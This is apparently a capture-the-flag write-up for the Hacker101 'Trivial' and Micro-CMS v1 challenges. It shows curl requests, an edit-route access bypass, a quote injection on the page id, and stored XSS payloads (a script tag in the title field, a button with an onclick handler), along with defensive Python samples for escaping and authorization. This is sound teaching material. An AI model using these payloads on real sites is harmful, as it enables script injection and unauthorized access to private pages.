two
TRIVIAL : little something to get you started
Being trivial, the flag must be in the page source, so use curl:

$ curl <url-instance>

This gives the page source; notice:

background-image: url("background.png");

Again with /background.png:

$ curl <url-instance>/background.png

gives: ^FLAG^<flag>$FLAG$

Here <flag> is a placeholder for the real flag.
EASY : Micro-CMS v1
Tinkering with the source and the UI gives the structure:
page URLs: <url-instance>/page/<page-number>
edit page URLs: <url-instance>/page/edit/<page-number>
FLAG 1
Editing and traversing the pages in order, most page numbers fetch 'NOT FOUND':

$ curl <url-instance>/page/<page-number>

<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

BUT one of the pages fetches 'FORBIDDEN':

$ curl <url-instance>/page/<page-number>

<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>

Hence we can't really see what is on this page, so as a workaround we change the URL to the edit route for that page instead:

$ curl <url-instance>/page/edit/<page-number-forbidden>

<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="Private Page"><br>
<textarea name="body" rows="10" cols="80">My secret is ^FLAG^<flag>$FLAG$</textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>
<!--flag in <textarea> under the <flag> placeholder-->
FLAG 2
Simple injection on the URL under /edit/ with ':

$ curl <url-instance>/page/edit/<any-page-number>\'
$ curl <url-instance>/page/edit/<any-page-number>\'"awd"sasatsgasgas

It turns out that appending characters after the ' doesn't change much in the output; both commands' output gives the required flag.
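The two findings above come from the view route and the edit route enforcing different rules on the same page, and from a page number that is not validated before use. As an added example (not Micro-CMS's own code; the page store, the `private` flag and the admin flag are constructed for illustration), here is a single gate that both routes share, plus a strict parser for `<page-number>` that rejects anything but a plain decimal id:

```python
import re

# Constructed sample store standing in for the CMS's pages; page 3 is the
# read-protected one that /page/<n> answers with 403.
PAGES = {
    1: {"title": "Testing", "body": "hello", "private": False},
    3: {"title": "Private Page", "body": "My secret is ^FLAG^<flag>$FLAG$", "private": True},
}

_PAGE_ID = re.compile(r"[0-9]{1,9}")


def parse_page_id(raw):
    """Accept only a plain decimal id ("1", "10"); anything else, such as "1'"
    or "9awd", is rejected before it can reach a query or a template."""
    if not _PAGE_ID.fullmatch(raw):
        return None
    return int(raw)


def authorize(page_id, user_is_admin=False):
    """The one policy every page route consults: 404 for an unknown id,
    403 for a private page when the caller is not an admin, else 200."""
    page = PAGES.get(page_id)
    if page is None:
        return 404
    if page["private"] and not user_is_admin:
        return 403
    return 200


def _gate(raw_id, user_is_admin):
    """Shared entry for view and edit: validate the id, then authorize."""
    pid = parse_page_id(raw_id)
    if pid is None:
        return 404, None
    status = authorize(pid, user_is_admin)
    return status, (PAGES[pid] if status == 200 else None)


def view_page(raw_id, user_is_admin=False):
    """GET /page/<n>: returns (status, body)."""
    status, page = _gate(raw_id, user_is_admin)
    return status, (page["body"] if page else None)


def edit_page(raw_id, user_is_admin=False):
    """GET /page/edit/<n>: the same gate, so the edit route is never weaker."""
    status, page = _gate(raw_id, user_is_admin)
    return status, (page["body"] if page else None)
```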
FLAG 3
Micro-CMS is vulnerable to XSS; after trying for a while, XSS comes out ahead for the remaining flags.
The way this page is created mitigates XSS injection in <textarea>: it actively changes <script></script> to <scrubbed></scrubbed>.

XSS in <textarea>:

$ curl <url-instance>/page/edit/1

<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="Testing"><br>
<textarea name="body" rows="10" cols="80"><script>alert('slert')</script></textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>

changes to:

$ curl <url-instance>/page/1

<html>
<head>
<title>Testing</title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/1">Edit this page</a>
<h1>Testing</h1>
<scrubbed>alert('slert')</scrubbed>
</body>
</html>

Furthermore, if we use the same XSS on Title : <input..>, it works (it requires navigating to the base URL after saving)!

Payload in the form's <input value="..">:

$ curl <url-instance>/page/edit/1

<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="<script>alert('slert')</script>"><br>
<textarea name="body" rows="10" cols="80"><script>alert('slert')</script> </textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>

$ curl <url-instance>/page/1

<html>
<head>
<title><script>alert('slert')</script></title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/1">Edit this page</a>
<h1><script>alert('slert')</script></h1>
<scrubbed>alert('slert')</scrubbed>
</body>
</html>

To finally obtain the flag, navigate back to the Micro-CMS base URL, which gives the flag as an alert:

$ curl <url-instance>

<html>
<head>
<title>Micro-CMS</title>
</head>
<body>
<ul>
<li><a href="page/1"><script>alert("^FLAG^<flag>$FLAG$");</script><script>alert('slert')</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/9">awd</a></li>
</ul>
<a href="page/create">Create a new page</a>
</body>
</html>
<!--flag under <href> with the <flag> placeholder-->
FLAG 4
XSS can be injected into buttons; under the edit page, insert the payload
<button onclick=alert("xss")>call</button>

Button XSS: the onclick function calls alert!

$ curl <url-instance>/page/edit/10

<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="button"><br>
<textarea name="body" rows="10" cols="80"><button onclick=alert("aha")>call</button></textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>

$ curl <url-instance>/page/10

<html>
<head>
<title>button</title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/10">Edit this page</a>
<h1>button</h1>
<p><button flag="^FLAG^<flag>$FLAG$" onclick=alert("aha")>call</button></p>
</body>
</html>
<!--flag under the <flag> placeholder-->
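FLAG 3 and FLAG 4 both come from the same defect: the CMS rewrites the <script> tag name in the body but leaves the title untouched and ignores event-handler attributes. As an added example (not Micro-CMS's own code; the render functions are constructed to mimic what the outputs above show), here is that tag-rename scrubber beside output escaping, with a checker for the two payload shapes quoted on this page:

```python
import html
import re

# Constructed inputs: the two payload shapes quoted in the writeup.
SCRIPT_PAYLOAD = "<script>alert('slert')</script>"
BUTTON_PAYLOAD = '<button onclick=alert("aha")>call</button>'

SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)
HANDLER_ATTR = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def scrub_like_microcms(text):
    """Rename only <script>/</script> to <scrubbed>/</scrubbed>, which is what
    the writeup observes on the body field. Everything else passes through."""
    return SCRIPT_TAG.sub(lambda m: m.group(0).lower().replace("script", "scrubbed"), text)


def render_naive(title, body):
    """Title goes straight into <title> and <h1>; only the body is scrubbed."""
    return (f"<title>{title}</title><h1>{title}</h1>"
            f"<p>{scrub_like_microcms(body)}</p>")


def render_escaped(title, body):
    """Escape on output in every HTML text context, whatever the input was."""
    t, b = html.escape(title), html.escape(body)
    return f"<title>{t}</title><h1>{t}</h1><p>{b}</p>"


def has_active_content(rendered):
    """Checker for the two payload shapes on this page (a live <script> tag or
    an inline on*= handler attribute); not a general-purpose sanitizer."""
    return bool(SCRIPT_TAG.search(rendered) or HANDLER_ATTR.search(rendered))
```

Running the three cases from the writeup through render_naive shows the body case neutralised, the title case and the button case still live; render_escaped clears all three.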